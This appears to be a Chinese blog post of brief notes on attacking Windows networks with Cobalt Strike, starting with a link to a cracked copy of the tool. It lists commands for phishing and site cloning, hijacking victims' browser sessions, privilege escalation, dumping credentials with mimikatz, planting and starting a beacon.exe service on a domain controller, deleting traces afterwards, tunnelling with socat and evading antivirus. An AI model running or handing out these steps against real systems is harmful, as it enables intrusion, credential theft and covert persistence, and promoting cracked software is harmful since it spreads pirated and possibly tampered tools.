Cobalt Strike

 

COBAIT STRIKE 3.14破解版:

https://download.csdn.net/download/weixin_41082546/11604021

 

客户端攻击重定向设置

view —application 查看目标系统日志

attack—web-drive-by—site clone

在此之前需要先生成一段攻击代码

钓鱼邮件实施 的4个阶段

session传递

将cobait strike 的 session 传递给metasploit框架的兄弟

新建监听,主机和端口与metasploit 框架兄弟一致

spawn 将 session 传递给metasploit队友

浏览器转发

使用目标的身份进入网站,目前只支持IE浏览器

其实相当于我们直接使用目标应用在浏览网页,加入对方近期登陆过某些网站并且cookie信息还存在,我们无需密码就可以进入对方的博客、邮箱等。

设置浏览器代理

CS上可以看到事件日志信息

权限提升

cmd下输入 whoami /groups 查看用户所属系统等级信息

win vista 之后系统权限等级分为三个等级,高级(管理)、中级(普通)、低级(限制执行)

powerup 权限提升

shell whoami /groups 查看用户和组信息

我们尝试使用powertools 下面的 powerup 来提权

mimikatz lsadump::cache 获取lasas中的明文口令

mimikatz misc::memssp

cd C:\windows\sysnative

shell dir mimilas.log

shell mimilas.log

shell type mimilas.log

获取管理员用户凭证,当我们上面执行mimikatz misc::memssp 的时候它已经下载到本地了

枚举的命令和方法

内网横向扩展

powerview 是用 powershell 写的工具

net 模块 是通过windows 的网络管理API 函数来处理问题

shell dir \\DC\c$

返回拒绝访问,说明我们没有权限

我们用文件服务器来尝试同样的事情

shell dir \\FILESERVER\C$

如何找出域管理员

net localgroup \\DC

net group

注:任何域的管理员都是登录到域的不同机器上的本地管理员权限

黄金票据

shell C:\windows\sysnative\klist

shell whoami \user 查看sid

upload beacon.exe

shell copy beacon.exe C:\\windows\temp

shell sc \\dc create beacon binpath=C:\windows\temp\beacon.exe

shell sc \\dc start beacon.exe

清除痕迹

shell sc \\dc delete beacon.exe

shell del \\dc\C$\windows\temp\beacon.exe

socks 转发

使用CS全局代理进行探测

反向转发隧道

设置转发

钓鱼

当目标点击了邮件中的链接,我们将获得一个新的session

ssh通道

使用metasploit框架 代理链接和socks代理转发来通过“beacon”通道来传输数据。

ssh 中的 -D 参数可以搭建一个代理服务器来转发任何通过它的连接。

这里的1080 端口本质上是一个代理服务器,任何通过这个代理服务器的数据都会被转发到远程服务器上。

socat tcp4-listen:445,fork tcp4:192.168.88.158:445

通过使用本地socks代理服务器,所有传输的数据自动转入我们攻击的目标

免杀

查看SPF 记录

查看dmarc记录

使用artifact进行免杀处理

applet 渗透测试

posted @ 2019-08-24 17:48  micr067  阅读(325)  评论(0编辑  收藏  举报